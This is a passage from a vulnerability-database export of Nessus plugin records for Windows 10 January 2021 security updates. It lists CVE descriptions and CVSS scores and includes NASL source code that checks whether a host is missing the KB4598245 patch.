(CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability. This CVE ID is unique from CVE-2021-1683, CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598245: Windows 10 Version 1803 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", 
"CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598245.NASL", "href": "https://www.tenable.com/plugins/nessus/144880", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144880);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n 
\"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"MSKB\", value:\"4598245\");\n script_xref(name:\"MSFT\", value:\"MS21-4598245\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598245: Windows 10 Version 1803 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. 
(CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. 
(CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598245/windows-10-update-kb4598245\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8f58c04\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598245.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows 
: Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598245'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598245])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-02T20:35:27", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. 
(CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. 
(CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability. This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. 
(CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability. This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability. This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598231: Windows 10 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 